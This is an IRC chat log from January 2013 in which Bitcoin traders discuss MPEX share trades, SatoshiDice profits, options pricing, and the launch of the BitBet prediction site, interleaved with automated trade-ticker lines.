dooglus if you don't mind Jan 05 04:02:43 "So.. like.. is it just me or does every single "company" (with the exception of satoshi dice and possibly one or two others) make a huge loss ?" Jan 05 04:02:44 i lolled. Jan 05 04:03:01 no, the lost 11k after winning 10k, so went 1k under. They're now back near 1k over. Jan 05 04:03:07 https://bitcointalk.org/index.php?topic=80312.660 Jan 05 04:03:50 ty Jan 05 04:04:17 [MPEX] [S.DICE] 1191 @ 0.00402585 = 4.7948 BTC [+] Jan 05 04:04:19 [MPEX] [S.DICE] 1269 @ 0.00402001 = 5.1014 BTC [-] Jan 05 04:04:54 That's actually neat looking charts Jan 05 04:08:05 mhm Jan 05 04:08:09 he does a good job dooglus Jan 05 04:08:39 Final SD Profit: 34221.17042144 BTC (1.789%) Jan 05 04:08:47 ya that's about 1k give or take Jan 05 04:09:08 ;;later tell bugpowder hey how about that 10k+1.9% theory :D Jan 05 04:09:09 The operation succeeded. Jan 05 04:15:02 pigeons http://www.reddit.com/r/Bitcoin/comments/15wu05/well_reddit_we_listened_bitcoin_consumer_group/ Jan 05 04:15:04 [MPEX] [S.DICE] 3550 @ 0.00407768 = 14.4758 BTC [+] Jan 05 04:17:16 < mircea_popescu> he does a good job dooglus <<< yeah, i send him a tip every once in a while, hoping that he continues so I don't have to start doing it myself Jan 05 04:18:09 eyah Jan 05 04:18:19 yeah Jan 05 04:18:24 i am right though Jan 05 04:18:33 but with that variance Jan 05 04:18:35 ... Jan 05 04:18:52 it's because of the max bet limits Jan 05 04:18:56 whales better not go away with the new TxOut lucky number scheme Jan 05 04:19:08 !ticker S.DICE Jan 05 04:19:09 [MPEX:S.DICE] 1day: 0.00360675 / 0.00385458 / 0.0048 (645266 shares, 2,487.23 BTC), 30day: 0.0014 / 0.00331107 / 0.0048 (13610140 shares, 45,064.20 BTC) Jan 05 04:19:20 [MPEX] [S.DICE] 100 @ 0.00407768 = 0.4078 BTC [+] Jan 05 04:19:22 is the middle value swap? Jan 05 04:19:29 vwap? Jan 05 04:19:49 it's the magic number, ofc Jan 05 04:20:10 yeah it's vwap Jan 05 04:20:35 https://bitcointalk.org/index.php?topic=101902.msg1435236#msg1435236 currently i'm in awe of this Jan 05 04:21:11 I so want to value S.DICE at .0048 in my portfolio right now Jan 05 04:21:24 hmm Jan 05 04:21:36 are they seriously talking about mpex? Jan 05 04:21:51 no bitfunder Jan 05 04:22:01 oh Jan 05 04:22:02 this dipshits are so clueless Jan 05 04:22:13 now they are shareholders Jan 05 04:22:31 there's just no way bitfunder does that tho Jan 05 04:22:48 BUgpowder ya, 2share holders. Jan 05 04:23:04 cryptoxchange used to go off of what you bid at, rather than the lowest ask Jan 05 04:23:15 uh Jan 05 04:23:16 no ?! Jan 05 04:23:17 (and vice-versa) Jan 05 04:23:18 lolll Jan 05 04:23:26 its funny though Jan 05 04:23:34 someone did get filled at 0.039. Jan 05 04:23:39 mircea_popescu: uh, yeah, it's why I stopped using them, Jan 05 04:23:47 my mind is blown. Jan 05 04:24:02 i lost a quarter btc or so and contacted support Jan 05 04:24:09 but i take solace in the hope the interpol is going to get them Jan 05 04:24:21 I guess the asks were missing for a bit Jan 05 04:24:21 they were liek, ya, it did what we designed it to do. Jan 05 04:25:20 So why has MPOE-PR been is such a good mood lately? Nice vacation or something? Jan 05 04:25:34 i guess lol Jan 05 04:25:52 she's actually a pretty easy-going type Jan 05 04:28:34 ;;ticker Jan 05 04:28:35 BTCUSD ticker | Best bid: 13.48000, Best ask: 13.48367, Bid-ask spread: 0.00367, Last trade: 13.48367, 24 hour volume: 29285.79710781, 24 hour low: 13.27311, 24 hour high: 13.54800, 24 hour vwap: 13.43482 Jan 05 04:34:01 wow Jan 05 04:34:17 20day std.dev. has not been this low since the beginning of june Jan 05 04:34:35 super boring Jan 05 04:34:43 nobody is buying options Jan 05 04:34:49 what am i gonna do Jan 05 04:34:56 when satoshi dice peaks Jan 05 04:35:01 I would, but noone is selling them cheap enough Jan 05 04:35:05 :P Jan 05 04:35:09 whats THE NEXT BIG THING? Jan 05 04:35:16 What would you buy for smickles? Jan 05 04:35:32 I don't want to sell to the bot Jan 05 04:35:36 mpoe bot Jan 05 04:35:45 but I'm getting bored Jan 05 04:35:49 waiting Jan 05 04:35:55 BUgpowder: you see all those bids for 1 contract between the strikes of 12 and 15 Jan 05 04:35:59 that's me :D Jan 05 04:36:29 your bids suck Jan 05 04:36:30 yo Jan 05 04:36:46 ALso I don't have 1001 options to sell Jan 05 04:36:51 [MPEX] [S.DICE] 598 @ 0.00418797 = 2.5044 BTC [+] Jan 05 04:37:08 if i had more btc, i'd be writing splits to sell Jan 05 04:37:43 and some of it would be sold to mpoebot Jan 05 04:38:13 heh Jan 05 04:38:14 well Jan 05 04:38:25 I wrote a few hundered Jan 05 04:38:30 BUgpowder: how are you valuing things right now, with all this stability? Jan 05 04:38:34 wish I put it in S.DICE Jan 05 04:38:50 I don't have a good american options model Jan 05 04:39:55 but I think a strangle while buying some way OTM puts /calls for protection might not be a bad play Jan 05 04:41:46 [MPEX] [S.DICE] 2700 @ 0.00424664 = 11.4659 BTC [+] Jan 05 04:41:47 [MPEX] [S.DICE] 100 @ 0.00426313 = 0.4263 BTC [+] Jan 05 04:41:49 [MPEX] [S.DICE] 200 @ 0.00430915 = 0.8618 BTC [+] Jan 05 04:41:51 yeah Jan 05 04:41:54 go go go Jan 05 04:42:00 Jan 05 04:42:09 !ticker Jan 05 04:42:10 Provide ticker. Jan 05 04:42:17 !ticker S.DICE Jan 05 04:42:18 [MPEX:S.DICE] 1day: 0.00360675 / 0.00385737 / 0.0048 (646959 shares, 2,495.57 BTC), 30day: 0.0014 / 0.00331133 / 0.0048 (13613295 shares, 45,078.12 BTC) Jan 05 04:42:52 So bored. Jan 05 04:43:03 want to watch game of thrones season 2 Jan 05 04:43:18 [MPEX] [S.DICE] 352 @ 0.0042397 = 1.4924 BTC [-] Jan 05 04:43:29 wife is watching an interview with Anthony Piazza "The Michael Jordon of Mediators" Jan 05 04:43:41 [MPEX] [S.DICE] 2805 @ 0.00411747 = 11.5495 BTC [-] Jan 05 04:43:42 [MPEX] [S.DICE] 195 @ 0.00430915 = 0.8403 BTC [+] Jan 05 04:43:58 lolwut, https://peerbet.org/index.php << the business model seems to be gather enough deposits, run Jan 05 04:44:38 no way the ads will even cover hosting Jan 05 04:47:12 [MPEX] [S.DICE] 953 @ 0.004204 = 4.0064 BTC [-] Jan 05 04:49:00 whats THE NEXT BIG THING? hehe hold that thought an hour. Jan 05 04:49:28 :) Jan 05 04:49:30 :-P Jan 05 04:49:42 :-D --8 Jan 05 04:54:28 !ticker S.DICE Jan 05 04:54:29 [MPEX:S.DICE] 1day: 0.00360675 / 0.00385934 / 0.0048 (651264 shares, 2,513.45 BTC), 30day: 0.0014 / 0.00331159 / 0.0048 (13617600 shares, 45,096.01 BTC) Jan 05 05:04:16 [MPEX] [S.DICE] 826 @ 0.00423181 = 3.4955 BTC [+] Jan 05 05:11:08 !ticker S.MPOE Jan 05 05:11:10 [MPEX:S.MPOE] 1day: 0.00063114 / 0.00064393 / 0.00065919 (281009 shares, 180.95 BTC), 30day: 0.00050708 / 0.00059773 / 0.00066 (59885099 shares, 35,795.53 BTC) Jan 05 05:13:25 [MPEX] [S.DICE] 3000 @ 0.00412874 = 12.3862 BTC [-] Jan 05 05:27:30 [MPEX] [S.DICE] 1392 @ 0.00423438 = 5.8943 BTC [+] Jan 05 05:32:59 [MPEX] [S.MPOE] 34050 @ 0.00065919 = 22.4454 BTC [+] Jan 05 05:40:10 [MPEX] [S.DICE] 400 @ 0.00430915 = 1.7237 BTC [+] Jan 05 05:43:48 !ticker S.DICE Jan 05 05:43:49 [MPEX:S.DICE] 1day: 0.00360675 / 0.00386993 / 0.0048 (626638 shares, 2,425.05 BTC), 30day: 0.0014 / 0.00331196 / 0.0048 (13620318 shares, 45,109.99 BTC) Jan 05 05:44:21 whats the next big thing? Jan 05 05:45:09 announcement imminent :D Jan 05 05:47:21 MPEx adopts the 'fail fast' model, shutting down Jan 05 05:48:29 [MPEX] [S.DICE] 1850 @ 0.00430915 = 7.9719 BTC [+] Jan 05 05:50:37 Kevin Rose would be proud Jan 05 05:52:41 lol Jan 05 05:52:50 nah, nothing of the kind Jan 05 06:03:40 [MPEX] [S.DICE] 1200 @ 0.00428 = 5.136 BTC [-] Jan 05 06:08:58 ;;tslb Jan 05 06:09:02 Time since last block: 29 minutes and 10 seconds Jan 05 06:13:49 [MPEX] [S.DICE] 455 @ 0.00430915 = 1.9607 BTC [+] Jan 05 06:29:18 [MPEX] [S.DICE] 1360 @ 0.004331 = 5.8902 BTC [+] Jan 05 06:36:24 woah woah woah woah woah Jan 05 06:36:40 i just found that my bot 404'd on mpex an hour ago Jan 05 06:38:35 ? Jan 05 06:38:48 i see it ? Jan 05 06:39:43 I just didn't except a 404 Jan 05 06:40:36 can you see what url ? Jan 05 06:42:30 mircea_popescu: it 404'd on an order placement Jan 05 06:43:03 and it was probably just a momentary thing, and I didn't have code to handle it, so my bot stalled Jan 05 06:43:20 but... it makes no sense Jan 05 06:43:35 as wtf would mpex 404 for. Jan 05 06:43:47 [MPEX] [S.MPOE] 3124 @ 0.00065919 = 2.0593 BTC [+] Jan 05 06:43:48 [MPEX] [S.MPOE] 3900 @ 0.00065953 = 2.5722 BTC [+] Jan 05 06:43:50 [MPEX] [S.MPOE] 8676 @ 0.00066 = 5.7262 BTC [+] Jan 05 06:43:54 pm me your ip i'll look in logs. Jan 05 06:46:25 ok, i just looked in the logs for today. there is no 404. Jan 05 06:46:30 in fact, there is nothing but 200. Jan 05 06:47:25 [MPEX] [S.DICE] 400 @ 0.00435909 = 1.7436 BTC [+] Jan 05 06:47:26 [MPEX] [S.DICE] 400 @ 0.00436108 = 1.7444 BTC [+] Jan 05 06:48:06 www.followthatpage.com whoa didn't even know this exists. Jan 05 06:50:33 heh, google provides that service too Jan 05 06:50:41 gives you emails or an rss feed Jan 05 06:50:49 or text messages, iirc Jan 05 07:03:01 [MPEX] [S.DICE] 1025 @ 0.00436108 = 4.4701 BTC [+] Jan 05 07:18:16 [MPEX] [S.DICE] 3083 @ 0.00434 = 13.3802 BTC [-] Jan 05 07:18:22 [MPEX] [S.DICE] 1000 @ 0.0044719 = 4.4719 BTC [+] Jan 05 07:18:23 [MPEX] [S.DICE] 400 @ 0.00447191 = 1.7888 BTC [+] Jan 05 07:24:44 [MPEX] [S.MPOE] 19150 @ 0.00065149 = 12.476 BTC [-] Jan 05 07:24:44 [MPEX] [S.MPOE] 3350 @ 0.00065078 = 2.1801 BTC [-] Jan 05 07:35:17 [MPEX] [S.DICE] 1250 @ 0.00451211 = 5.6401 BTC [+] Jan 05 07:37:48 [MPEX] [S.DICE] 1800 @ 0.00451211 = 8.1218 BTC [+] Jan 05 07:38:59 sooo, drumroll! Jan 05 07:38:59 http://mpex.co/?mpsic=S.BBET Jan 05 07:39:41 [MPEX] [S.DICE] 653 @ 0.00455393 = 2.9737 BTC [+] Jan 05 07:40:25 *tumbleweed* Jan 05 07:43:31 lol Jan 05 07:47:46 [MPEX] [S.DICE] 2100 @ 0.00460163 = 9.6634 BTC [+] Jan 05 07:51:02 also forum link https://bitcointalk.org/index.php?topic=134799.0 Jan 05 07:55:24 [MPEX] [S.DICE] 800 @ 0.00460163 = 3.6813 BTC [+] Jan 05 07:55:25 [MPEX] [S.DICE] 1300 @ 0.00461305 = 5.997 BTC [+] Jan 05 07:55:27 [MPEX] [S.DICE] 300 @ 0.00462586 = 1.3878 BTC [+] Jan 05 08:00:59 cool Jan 05 08:05:03 [MPEX] [S.MPOE] 8700 @ 0.00066 = 5.742 BTC [+] Jan 05 08:13:16 pizzaman1337 tell your friends :D Jan 05 08:23:31 wow the mpex banner ad makes mpex look sexy Jan 05 08:23:37 until you click the link Jan 05 08:24:18 lol Jan 05 08:24:23 advertising for you Jan 05 08:25:52 who keeps buying the asks and selling the bids? Jan 05 08:26:53 mircea_popescu: does bcgi have the doubble cherry truck (semi-articulated lorry) award? Jan 05 08:27:04 pigeons no wai! Jan 05 08:27:14 also, what symbol you mean ? Jan 05 08:27:46 [MPEX] [S.MPOE] 22650 @ 0.00066 = 14.949 BTC [+] Jan 05 08:27:50 i mean the Bitcoin Consumer Group Interest you told me about Jan 05 08:28:08 oh dice and mpoe Jan 05 08:28:16 both Jan 05 08:28:59 o. my guess would be "people" Jan 05 08:29:52 they will never get big enough to be a scam Jan 05 08:31:30 this should just be the new forum headline Jan 05 08:32:25 so pigeons you saw bitbet ? Jan 05 08:32:46 yep, congrats, good luck Jan 05 08:32:59 you forgot "good bye" Jan 05 08:33:00 :D Jan 05 08:33:04 lol Jan 05 08:33:13 heh Jan 05 08:33:22 [MPEX] [S.DICE] 647 @ 0.00459936 = 2.9758 BTC [-] Jan 05 08:44:53 someone get hackelock investment guy in here Jan 05 08:44:58 did he show any holdings of S.DICE Jan 05 08:45:09 he has a non signed stetment Jan 05 08:45:11 from mpex Jan 05 08:45:13 lol Jan 05 08:45:14 :) Jan 05 08:45:20 tab 2 or 3 Jan 05 08:45:22 on the site Jan 05 08:45:31 when you look at the asset Jan 05 08:45:51 no-s-signed seem ridicukoius Jan 05 08:46:04 indeed so Jan 05 08:47:30 [MPEX] [S.DICE] 871 @ 0.00454891 = 3.9621 BTC [-] Jan 05 08:48:55 what ? link ? Jan 05 08:50:02 my internet is slow here at the trailer park Jan 05 08:50:12 [MPEX] [S.DICE] 381 @ 0.00459212 = 1.7496 BTC [+] Jan 05 08:50:15 Confirmed total: 121 BTC Jan 05 08:50:18 ok this is looking good. Jan 05 08:50:52 damn Jan 05 08:51:09 whoever wanted to short mpoe i guess now they can Jan 05 08:51:13 for as little as .1 btc or w/e Jan 05 08:51:32 short mpoe? Jan 05 08:51:53 well in a sense Jan 05 08:52:10 more of a hedge no? Jan 05 08:52:49 S.BBET! :] Jan 05 08:52:51 i guess actually Jan 05 08:52:54 mod6 hi! Jan 05 08:53:08 hi. just saw this. very cool Jan 05 08:54:03 Seems kinda small tho. 1% fee on such small bets. Jan 05 08:55:16 mod6 so make a bet! Jan 05 08:55:36 Namjies if it has 100 btc bet a day that's more monthly income than the average mining farm. Jan 05 08:55:48 im checkin it out now! suprised I haven't seen this yet... Jan 05 08:56:13 you couldn't have seeing how it was just opened hours ago. Jan 05 08:59:17 Aye. There's not too many bets in similar sites either Jan 05 08:59:50 Looks nice for a start tho Jan 05 09:00:02 [MPEX] [S.DICE] 236 @ 0.00454891 = 1.0735 BTC [-] Jan 05 09:00:08 [MPEX] [S.DICE] 664 @ 0.0045181 = 3 BTC [-] Jan 05 09:03:08 Looks like MPEx ate some of my bitcoins. Jan 05 09:04:11 ;;ident honeybadger Jan 05 09:04:12 Nick 'honeybadger', with hostmask 'honeybadger!ade705cb@gateway/web/freenode/ip.173.231.5.203', is not identified. Jan 05 09:04:23 mk, how do we identify you ? Jan 05 09:04:42 I sent you a message on bitcointalk Jan 05 09:04:48 been experimenting with CoinBR. Jan 05 09:04:55 signed it there. Jan 05 09:05:30 mpoe-pr ? Jan 05 09:05:40 that's the pr chick and she's asleep. email ? Jan 05 09:07:19 you lost them on mpex or coinbr? Jan 05 09:07:41 Ok, got the message to sent to the PR. Where would you like me to send it? Jan 05 09:07:59 Was going to use the direct deposit method with CoinBR. Jan 05 09:08:10 http://trilema.com/wp-content/uploads/office.jpg Jan 05 09:08:13 it's in the faq Jan 05 09:08:35 but if you don't have the depisit signature (such as, coinbr did it, not you) you'll have to bug jurov about it Jan 05 09:08:55 it told me to send a specific amount; the iPhone Blockchain app rounded up by .00000042; Google Docs does it .0000004199999999 when I try to get the difference between the two. Jan 05 09:09:15 o boy. Jan 05 09:09:30 yeah, so I don't think the iPhone app did it. Jan 05 09:09:33 DEPOSIT|{sum}, where the sum is an integer, written in BTC (note that you can not deposit less than 10 BTC). You will be quoted an exact sum, which you must send to the exchange address (1Fx3N5iFPDQxUKhhmDJqCMmi3U8Y7gSncx). Don't round anything, the decimals are there to identify you as the beneficiary. You will be credited the full amount. Jan 05 09:10:20 its jobs fault Jan 05 09:10:30 25.02770658; copy pasted with the did that with the QR code that scanned; verified it then hit send payment; it sent 25.027707 Jan 05 09:11:12 in Google Docs 25.027707-25.02770658=.0000004199999999 Jan 05 09:11:25 aite, drop by tomorrow, we'll see what jurov has to say about this. Jan 05 09:11:41 as for now, i bid you all a very good 7am night. Jan 05 09:11:52 can you hit him up about it; I'll be in Vegas for CES and probably can't stop by. Jan 05 09:12:00 sure. Jan 05 09:12:04 thanks. **** BEGIN LOGGING AT Sat Jan 5 16:33:15 2013 Jan 05 16:33:38 jurov baby you about ? Jan 05 16:34:12 on Jan 05 16:37:49 [MPEX] [S.DICE] 250 @ 0.00441766 = 1.1044 BTC [+] Jan 05 16:39:19 yes? Jan 05 16:40:15 [MPEX] [S.MPOE] 19600 @ 0.00065796 = 12.896 BTC [-] Jan 05 16:42:03 mircea_popescu WRT S.BBET Can you be more specific as to how the IPO share allocation will work with respect to buy orders placed before Jan 11? Is it based on time of order placement priority, proportional distribution to all valid orders, lotto system? Jan 05 16:42:39 nope, the orders just go out on the 11th Jan 05 16:42:47 [MPEX] [S.DICE] 900 @ 0.00441766 = 3.9759 BTC [+] Jan 05 16:42:47 whoever has the top bid gets it (at the price he bid) Jan 05 16:43:05 eventually as bids and asks exhaust each other a gap will form. Jan 05 16:43:16 so block 1 goes on sale Jan 05 16:43:31 and person with the highest bid gets it Jan 05 16:43:32 ? Jan 05 16:43:45 yeah, like any normal sale. if i was to sell 10k of my stock right now, what'd happen ? Jan 05 16:43:53 no matter what price i ask, as long as it's under what we have there Jan 05 16:43:59 18`177 0.00045950 Jan 05 16:44:04 so, 10k sells 45950, Jan 05 16:44:06 i see Jan 05 16:44:14 8.177 left on book, next block sells into that etc. Jan 05 16:44:24 ok makes sense Jan 05 16:44:45 was hoping for time of order priority of course Jan 05 16:44:50 then I would be rich Jan 05 16:45:02 ya but if i had a scheme like that i wouldn't be issuing at 1k satoshi. Jan 05 16:45:21 obviously a lot of what we do here is experimental, this method should allow for very wide price discovery. Jan 05 16:53:19 that said, i'm really curious where price ends up Jan 05 16:57:31 [MPEX] [S.DICE] 2610 @ 0.00441766 = 11.5301 BTC [+] Jan 05 16:59:13 ;;calc 101.57 / 0.33 Jan 05 16:59:14 307.787878788 Jan 05 16:59:23 ;;calc 3.17 / 0.15 Jan 05 16:59:23 21.1333333333 Jan 05 16:59:45 so... it's about 15 times more likely for BFL to deliver asics by april than for mpoe to crash under 3 Jan 05 17:01:53 [MPEX] [S.MPOE] 4951 @ 0.00065796 = 3.2576 BTC [-] Jan 05 17:01:54 [MPEX] [S.MPOE] 1045 @ 0.00065465 = 0.6841 BTC [-] Jan 05 17:01:56 [MPEX] [S.MPOE] 2800 @ 0.00064617 = 1.8093 BTC [-] Jan 05 17:09:15 [MPEX] [S.DICE] 163 @ 0.00441766 = 0.7201 BTC [+] Jan 05 17:09:16 [MPEX] [S.DICE] 1637 @ 0.00441792 = 7.2321 BTC [+] Jan 05 17:23:52 [MPEX] [S.DICE] 1163 @ 0.00441792 = 5.138 BTC [+] Jan 05 17:38:25 < mircea_popescu> so... it's about 15 times more likely for BFL to deliver asics by april than for mpoe to crash under 3 Jan 05 17:38:33 wut? Jan 05 17:38:51 http://bitbet.us/ Jan 05 17:38:53 first two Jan 05 17:38:56 oh Jan 05 17:39:09 i thought you had fancy maths Jan 05 17:39:23 these be fancy maths dammit. Jan 05 17:39:46 the mpoe bet sound like a nice hedge Jan 05 17:40:06 assuming this 'got milk' site is 'legit' Jan 05 17:40:22 lol, I see a great ad there Jan 05 17:40:58 [MPEX] [S.DICE] 1400 @ 0.00445519 = 6.2373 BTC [+] Jan 05 17:41:03 you musta missed the announcement Jan 05 17:41:11 https://bitcointalk.org/index.php?topic=134799.msg1435580#msg1435580 Jan 05 17:41:40 i did wander off, have a beer (OMGPISS) and go to bed Jan 05 17:42:11 oh shit! it's listed too? Jan 05 17:42:24 ;;tslb Jan 05 17:42:28 Time since last block: 27 minutes and 0 seconds Jan 05 17:42:34 all the good stuff Jan 05 17:42:36 [MPEX] [S.MPOE] 7200 @ 0.00064286 = 4.6286 BTC [-] Jan 05 17:42:38 [MPEX] [S.MPOE] 13900 @ 0.00064196 = 8.9232 BTC [-] Jan 05 17:42:40 oh shit! kakobreklaa irlname is Matic? Jan 05 17:42:57 isn't that funnay ? Jan 05 17:43:06 why is it funny Jan 05 17:43:36 i thought you were gone! Jan 05 17:43:41 almost Jan 05 17:43:42 I thought it was funny b/c i repeated myself but changed it to an immaterial detail Jan 05 17:44:17 it's funnay because if your last name were auto... Jan 05 17:44:29 accually people close to me call me 'tic' which sounds like 'tits' but it can accually mean 'dick'. Jan 05 17:44:55 o, c is really tz huh Jan 05 17:45:07 sounds like tits but mean dick Jan 05 17:45:10 is what my twitter says Jan 05 17:45:13 hey, so what sets youguys apart from (say) betsofbitcoin Jan 05 17:45:58 colors! Jan 05 17:46:03 jk jk Jan 05 17:46:12 that's a great competitive edge Jan 05 17:46:19 i'ts how mpex beat glbse ofc Jan 05 17:46:21 well you dont need to register Jan 05 17:46:25 i think that is important factor Jan 05 17:46:33 ooh, yes indeed Jan 05 17:47:03 and we have comments Jan 05 17:47:08 and bets are public Jan 05 17:47:34 and you dont need to click next when you browse the bets :) Jan 05 17:47:58 well you cant click it cause the button aint there Jan 05 17:48:23 is it that autoload-infiniscroll thing? Jan 05 17:48:27 ya Jan 05 17:48:35 http://bitbet.us/browse/ Jan 05 17:48:37 scroll down Jan 05 17:50:40 i'm confused... is it an animated gif or something ? Jan 05 17:50:47 hm? Jan 05 17:51:12 heh, i mean, it just seems to load the whole page, is that b/c there are not enough bets currently? Jan 05 17:51:20 erm Jan 05 17:51:35 there 18 open bets Jan 05 17:51:39 it loads 5 bets at a time Jan 05 17:52:02 i dunno i tested it in opera chrome ie and ff Jan 05 17:52:11 ah, maybe i just scroll to fast Jan 05 17:52:12 so im fairly sure as long you have JS running Jan 05 17:52:15 it should work Jan 05 17:52:17 oh Jan 05 17:52:19 that's it Jan 05 17:52:20 no JS Jan 05 17:52:30 does it say on the bottom Jan 05 17:52:34 something about js Jan 05 17:52:55 if i disable it Jan 05 17:52:58 i see 'Enable JavaScript to display more bets.' Jan 05 17:53:13 i seem to just see all the bets Jan 05 17:53:18 no js notice Jan 05 17:53:47 http://shrani.si/f/1w/vq/4nQ2cF8K/bottom.png Jan 05 17:53:51 you dont see that box? Jan 05 17:54:58 no box there Jan 05 17:55:19 I'll see if i can gather any useful infos Jan 05 17:55:22 which browser? Jan 05 17:55:26 show me your render Jan 05 17:56:48 is it loadingplaceholder? Jan 05 17:56:56 i'm using chromium Jan 05 17:59:39 Jan 05 17:59:46 i dunno how this could fail Jan 05 18:00:17 [MPEX] [S.DICE] 349 @ 0.00446546 = 1.5584 BTC [+] Jan 05 18:00:18 [MPEX] [S.DICE] 2100 @ 0.00447273 = 9.3927 BTC [+] Jan 05 18:00:19 [MPEX] [S.DICE] 551 @ 0.00448047 = 2.4687 BTC [+] Jan 05 18:00:27 anyway i gotta run now Jan 05 18:00:35 bbl Jan 05 18:01:36 [MPEX] [S.MPOE] 1800 @ 0.00064196 = 1.1555 BTC [-] Jan 05 18:01:37 [MPEX] [S.MPOE] 14851 @ 0.0006419 = 9.5329 BTC [-] Jan 05 18:01:39 [MPEX] [S.MPOE] 2999 @ 0.00064058 = 1.9211 BTC [-] Jan 05 18:02:46 [MPEX] [S.DICE] 2349 @ 0.00448047 = 10.5246 BTC [+] Jan 05 18:02:47 [MPEX] [S.DICE] 700 @ 0.00449023 = 3.1432 BTC [+] Jan 05 18:02:49 [MPEX] [S.DICE] 2452 @ 0.00449973 = 11.0333 BTC [+] Jan 05 18:02:50 [MPEX] [S.DICE] 1164 @ 0.00452306 = 5.2648 BTC [+] Jan 05 18:03:38 thai Jan 05 18:04:30 [MPEX] [S.MPOE] 12500 @ 0.00064058 = 8.0073 BTC [-] Jan 05 18:10:14 thowdy :) Jan 05 18:16:45 [MPEX] [S.MPOE] 2300 @ 0.00064328 = 1.4795 BTC [+] Jan 05 18:18:49 ( ͡° ͜ʖ ͡°) Jan 05 18:24:28 i seem to just see all the bets << nice failover. Jan 05 18:25:13 btw smickles two major sales points : 1. you can get referrals of 1% (= site rake) for any visitors you direct by simply adding ?ref=1bitcoinaddy on any link Jan 05 18:25:41 2. each bet gets a .1 btc pool by default, it gets split between yes and no, proposer gets the smaller stake to his own address Jan 05 18:26:16 ;;tslb Jan 05 18:26:19 Time since last block: 5 minutes and 43 seconds Jan 05 18:28:04 [MPEX] [S.DICE] 737 @ 0.00445519 = 3.2835 BTC [-] Jan 05 18:28:05 [MPEX] [S.DICE] 1063 @ 0.00442616 = 4.705 BTC [-] Jan 05 18:31:29 [MPEX] [S.MPOE] 1400 @ 0.00064328 = 0.9006 BTC [+] Jan 05 18:34:13 [MPEX] [S.MPOE] 23700 @ 0.00064328 = 15.2457 BTC [+] Jan 05 18:37:20 [MPEX] [S.MPOE] 22204 @ 0.00064328 = 14.2834 BTC [+] Jan 05 18:39:37 anyone seen the bitvps financial report yet? Jan 05 18:54:56 [MPEX] [S.DICE] 1217 @ 0.00442616 = 5.3866 BTC [-] Jan 05 18:54:57 [MPEX] [S.DICE] 716 @ 0.00441528 = 3.1613 BTC [-] Jan 05 18:54:59 [MPEX] [S.DICE] 1167 @ 0.00438706 = 5.1197 BTC [-] Jan 05 18:56:23 [MPEX] [S.DICE] 1836 @ 0.00438706 = 8.0546 BTC [-] Jan 05 18:56:25 [MPEX] [S.DICE] 764 @ 0.00436462 = 3.3346 BTC [-] Jan 05 19:15:04 [MPEX] [S.DICE] 1446 @ 0.00452306 = 6.5403 BTC [+] Jan 05 19:15:08 [MPEX] [S.DICE] 3500 @ 0.00453104 = 15.8586 BTC [+] Jan 05 19:15:09 [MPEX] [S.DICE] 154 @ 0.00453131 = 0.6978 BTC [+] Jan 05 19:15:46 [MPEX] [S.DICE] 2655 @ 0.00453131 = 12.0306 BTC [+] Jan 05 19:27:46 [MPEX] [S.MPOE] 5300 @ 0.00065954 = 3.4956 BTC [+] Jan 05 19:27:47 [MPEX] [S.MPOE] 3674 @ 0.00066 = 2.4248 BTC [+] Jan 05 19:33:43 [MPEX] [S.DICE] 3813 @ 0.00436462 = 16.6423 BTC [-] Jan 05 19:41:03 [MPEX] [S.DICE] 2800 @ 0.00436462 = 12.2209 BTC [-] Jan 05 20:04:05 ;;tslb Jan 05 20:04:21 Time since last block: 4 minutes and 26 seconds Jan 05 20:16:45 [MPEX] [S.DICE] 800 @ 0.00438885 = 3.5111 BTC [+] Jan 05 20:30:48 [MPEX] [S.DICE] 900 @ 0.00438885 = 3.95 BTC [+] Jan 05 20:35:06 mircea_popescu: the listed companies, do they agree to pay a fine to the exchange if they violate a clause of the shareholder agreement? Jan 05 20:35:27 like, bitvps has to present the financial report today Jan 05 20:35:33 not really. Jan 05 20:35:39 is there any penalty if they don't? at all? Jan 05 20:35:46 it's not practical, in the sense that a fine doesn't improve a company's incentive really. Jan 05 20:35:57 but i will be making a statement re bvps on the 15th Jan 05 20:36:08 giving teh ppl some time to get their shit together before then. Jan 05 20:36:34 so, what would give the incentive? Jan 05 20:37:14 delisting if it becomes egregious? Jan 05 20:37:17 what i mean is, if company is in good standing, the prospect of a fine if they're not in good standing isn't particularly impressive Jan 05 20:37:31 if they're NOT in good standing, a fine is just another promise not to keep Jan 05 20:37:35 again doesn't do much Jan 05 20:37:40 but yes. Jan 05 20:39:04 [MPEX] [S.DICE] 800 @ 0.00441901 = 3.5352 BTC [+] Jan 05 20:43:17 I am hopeful for S.BVPS and the new group to run it Jan 05 20:44:10 It's paid div's every months since IPO... too bad rg has too much going on just like the rest of us :P I'm hoping the new group can really take it where it needs to go. Jan 05 20:46:11 perhaps they have a problem to accurately account for downtime credits (i got 1.5BTC credit twice) Jan 05 20:47:03 yeah. more work needs to be put into it. Jan 05 20:48:13 jurov: As I am the chief scientist of the soebot foundation, you should send that extra 1.5 btc to me. Jan 05 20:49:29 i wish they would have tried to get you on retainer to do the monthly financials, smickles Jan 05 20:49:42 or at least, in a more perm basis Jan 05 20:50:01 I would've liked it too Jan 05 20:50:09 I did offer Jan 05 20:50:14 yeah, i remember that. Jan 05 20:51:03 stuff was just moving too fast this year -- this year will be a good time for them to get orginized and grow and maintain the company Jan 05 20:53:41 It has a sizeable customer base, or did at one time, that's worth trying to preserve. Jan 05 21:03:05 haha so i guess Namjies is the first guy to make some money on bitbet Jan 05 21:03:21 http://bitbet.us/bet/13/ Jan 05 21:03:27 with an unlucky number to boot Jan 05 21:05:14 ahh! earthquake 'eh Jan 05 21:06:36 [MPEX] [S.DICE] 254 @ 0.00453131 = 1.151 BTC [+] Jan 05 21:06:37 [MPEX] [S.DICE] 550 @ 0.00454738 = 2.5011 BTC [+] Jan 05 21:06:39 [MPEX] [S.DICE] 217 @ 0.00455387 = 0.9882 BTC [+] Jan 05 21:06:40 [MPEX] [S.DICE] 629 @ 0.00455792 = 2.8669 BTC [+] Jan 05 21:08:42 hehe Jan 05 21:09:27 if I had known, I think earthquakes are fairly common, especiall on that timeframe Jan 05 21:10:29 i imagine the person putting 1 btc in was expecting much better odds for his money lol Jan 05 21:17:49 [MPEX] [S.DICE] 5100 @ 0.00445112 = 22.7007 BTC [-] Jan 05 21:17:50 [MPEX] [S.DICE] 882 @ 0.00441901 = 3.8976 BTC [-] Jan 05 21:19:20 [MPEX] [S.DICE] 1471 @ 0.00455792 = 6.7047 BTC [+] Jan 05 21:19:21 [MPEX] [S.DICE] 2973 @ 0.00456817 = 13.5812 BTC [+] Jan 05 21:27:03 [MPEX] [S.MPOE] 15151 